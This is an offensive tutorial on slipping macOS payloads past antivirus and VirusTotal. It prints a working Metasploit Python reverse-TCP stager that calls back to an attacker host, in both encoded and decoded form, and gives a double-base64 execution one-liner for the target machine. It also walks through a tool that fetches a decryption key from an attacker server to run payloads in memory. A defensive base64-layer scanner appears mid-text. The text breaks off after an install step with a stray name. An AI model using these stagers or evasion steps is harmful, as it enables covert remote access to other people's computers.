
How to Create an Undetectable Payload – Hack macOS Like Pro

Encrypting payloads and encoding stagers are more effective against macOS than one might think. Plus, it’s very easy to evade VirusTotal and macOS antivirus software using a few simple tricks.

The goal of this project was to locate a known and easily detectable macOS payload, then find a method that allowed that very same payload to execute on the target MacBook. This would reliably confirm whether any discovered evasion method was effective at executing known payloads. In addition to testing malicious files against VirusTotal, they were tested in macOS Mojave (v10.14) against popular antivirus software such as Avast, AVG, BitDefender, Sophos, and ClamXAV.

Readers shouldn’t confuse this subject matter with bypassing Gatekeeper or System Integrity Protection (SIP). Executing an unsigned application and evading virus scanners are two different topics. The focus of this article will be on evading the detection of antivirus software and VirusTotal. As we’ll see below, in most cases, simply encoding a payload is enough to get around antivirus detection.

Base64 Encoding Basics

Encoding, as an antivirus evasion technique, is (generally) a very terrible idea as it’s easily decoded and identified. However, encoding Python and Bash scripts is common practice in projects like Empire and msfvenom (if you are not familiar with Metasploit and Empire, look them up before continuing). It allows coders to execute complex scripts without worrying about escaping special characters that might cause a payload to break or fail.

Let’s talk about base64 encoding for a minute and consider the below strings.

echo 'one' | base64
b25lCg==

echo 'one two' | base64
b25lIHR3bwo=

echo 'one two three' | base64
b25lIHR3byB0aHJlZQo=

echo 'one two three four' | base64
b25lIHR3byB0aHJlZSBmb3VyCg==

echo 'one two three four five' | base64
b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK

All of the strings can be easily decoded (-d in Kali, -D in macOS) using the below command.

base64 -d <<< 'b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK'

Notice that the end of each string changes subtly, while the beginning always appears the same. The same is true for most msfvenom payloads. If only the IP address and port number are changed, the beginning of the produced base64 encoded payload will always be the same for every hacker and pentester using msfvenom. Below is an example created by msfvenom using the IP address “10.42.0.1.”

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=

The below msfvenom output uses the same payload but with a different IP address of “192.168.0.2.”

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==

No matter what IP and port are used, the first 142 characters are always identical when using this msfvenom payload. If not decoded and analyzed for nefarious code, it would at least seem reasonable for antivirus software to detect common base64 strings — but they don’t.

Single Base64 Encoded Payloads

Believe it or not, finding a malicious file that VirusTotal and antivirus software could detect was a challenge. Executing the below command produced the following output.

msfvenom -p python/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=4444

[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
Payload size: 446 bytes
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

This is a base64 encoded Python one-liner designed to interact with Metasploit. Saving the one-liner to a file called “thisfileisevil.py” and uploading it to VirusTotal resulted in a 4/58 detection rate.

This detection rate is surprisingly low. Decoding the embedded base64 string clearly reveals the Python script is designed to connect to a remote server (10.42.0.1) on port 4444.

base64 -d <<< 'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='

import socket,struct,time
for x in range(10):
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('10.42.0.1',4444))
		break
	except:
		time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
	d+=s.recv(l-len(d))
exec(d,{'s':s})

Saving the above decoded Python code to a file called “thisfileisevil_without_encoding.py” and uploading it to VirusTotal resulted in the following 1/56 detection rate.

Double Base64 Encoded Payloads

If a common encoded payload is capable of evading most antivirus software, double-encoding it should be an effective technique too, right? Well, not quite. Encoding the encoded msfvenom output and uploading it to VirusTotal resulted in the following 1/54 detection.

Again, 1/54 detection, by Microsoft only, which doesn’t help anyone relying on antivirus software on macOS. This was accomplished by first encoding the msfvenom output — the very same msfvenom payload that was previously detected.

cat thisfileisevil.py | base64

It can be executed on the target MacBook with the following command.

python -c "$(printf '%s' 'ENCODED-PAYLOAD-HERE' | base64 -D)"

Here, printf and base64 decode (-D) the string on the MacBook and Python immediately executes the result (-c), which in turn decodes the inner payload and creates a reverse TCP connection.

To my surprise, both VirusTotal and popular antivirus software are evaded this way. None of the tested antivirus software was able to detect a double-encoded payload in the form of a text file or an AppleScript.

Encrypted Payloads

So far, we’ve learned encoding and double-encoding payloads will evade the detection of most antivirus software (although, using raw code is better). Still, encoding scripts and payloads encourages a cat and mouse game between hackers and antivirus developers. It’s only a matter of time before someone at AVG or Avast discovers this Null Byte article and antivirus scanners start recursively decoding base64 strings and looking for common encoded signatures.

This got me thinking about a more reliable method for defeating macOS antivirus; a solution that’s a bit more difficult to detect and prevent. Encrypting the payload, in addition to encoding it, will provide a better solution to evade antivirus scanners.

Why Is Encrypting Better Than Encoding?

The primary downside to encoding is antivirus software’s ability to continuously decode base64 strings and easily discover the embedded payload. No matter how many times an attacker encodes their payload, it can be reverse engineered. By encrypting the payload, antivirus software will ultimately find a string of unreadable data. The encrypted payload can’t be scanned by AV software or read by humans — not without knowing the decryption key.
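The recursive decoding that the previous two sections predict antivirus engines will eventually perform, written here as an added defender-side example (it is not code from this article or from Armor): it peels nested base64 layers and flags any layer where exec( sits alongside the other indicators visible in the decoded stager shown earlier. The test input it builds is constructed for the example and is deliberately not a working payload; the indicator strings and the layer limit are my own choices.

```python
import base64
import binascii
import re

# Long runs of the base64 alphabet, optionally padded: candidate encoded layers.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Plaintext indicators taken from the decoded stager discussed in the article.
INDICATORS = ("import socket,struct,time", "struct.unpack('>I'",
              "base64.b64decode(", "exec(")

def _try_decode(token):
    """Decode one candidate token; return text only if it is printable UTF-8."""
    padded = token + "=" * (-len(token) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text

def scan(text, depth=0, max_depth=4):
    """Return (layer, indicator) hits, recursing into every decodable layer."""
    hits = [(depth, ind) for ind in INDICATORS if ind in text]
    if depth < max_depth:
        for token in B64_TOKEN.findall(text):
            decoded = _try_decode(token)
            if decoded is not None:
                hits.extend(scan(decoded, depth + 1, max_depth))
    return hits

def deepest_layer(text):
    """Depth of the innermost layer that produced a hit, or -1 if none."""
    return max((d for d, _ in scan(text)), default=-1)

def is_suspicious(text):
    """Flag when exec( appears in the same layer as another stager indicator."""
    per_layer = {}
    for depth, ind in scan(text):
        per_layer.setdefault(depth, set()).add(ind)
    return any("exec(" in inds and len(inds) > 1 for inds in per_layer.values())

# Constructed test input (not a working payload): only the indicator lines of
# the article's decoded stager, with the connection logic left out.
SAMPLE_INNER = ("import socket,struct,time\n# connection loop omitted\n"
                "l=struct.unpack('>I',s.recv(4))[0]\nexec(d,{'s':s})\n")
BENIGN_SAMPLE = "see attached: " + base64.b64encode(
    b"a harmless message that is long enough to look like an encoded blob").decode()

def build_sample(layers):
    """Wrap SAMPLE_INNER in an msfvenom-style one-liner, then base64 it `layers` more times."""
    text = "import base64,sys;exec(base64.b64decode('%s'))\n" % (
        base64.b64encode(SAMPLE_INNER.encode()).decode())
    for _ in range(layers):
        text = base64.b64encode(text.encode()).decode()
    return text
```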

Which brings me to Armor, a simple shell script I created to illustrate how encrypting macOS payloads can be automated and executed.

How the ‘Armor’ Script Works

Armor will encrypt the contents of any file it’s given. The file can contain a one-liner, a complex Python script with hundreds of lines of code, or a post-exploitation script written in any programming language supported by macOS. The file contents are encrypted with a one-time key. The key is then temporarily hosted on the attacker’s server and downloaded by the target MacBook to decrypt the payload.

Below is an example of Armor being used with a simple Netcat payload.

There are a few things happening in this GIF. I’ll explain each step in order.

1. A Netcat listener is started on port 4444.
2. The “payload.txt” file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook and the attacker’s Netcat listener.
3. Armor is used to encrypt the Bash one-liner.
4. Ncat is used to host the decryption key on the attacker’s server.
5. When the stager is executed on the target MacBook (not shown in the GIF), the Bash one-liner is decrypted and executed without writing any data to the hard drive.
6. Ncat immediately terminates the listener after the key has been used.
7. When the Netcat connection is established, the attacker has remote access to the target MacBook.

For a technical explanation of what the script is doing and how it executes commands without writing data to the target’s hard drive, head over to my GitHub page to view the comments. Readers interested in giving Armor a quick test run can follow along using the below steps.

Step 1: Install Armor

Armor can be found on my GitHub page and cloned using the below command.

git clone https://github.com/tokyoneon/Armor

Cloning into 'Armor'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 7 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (7/7), done.

Change (cd) into the newly created Armor/ directory.

cd Armor/

Then, give the armor.sh script permissions to execute.

Lovepreet Singh
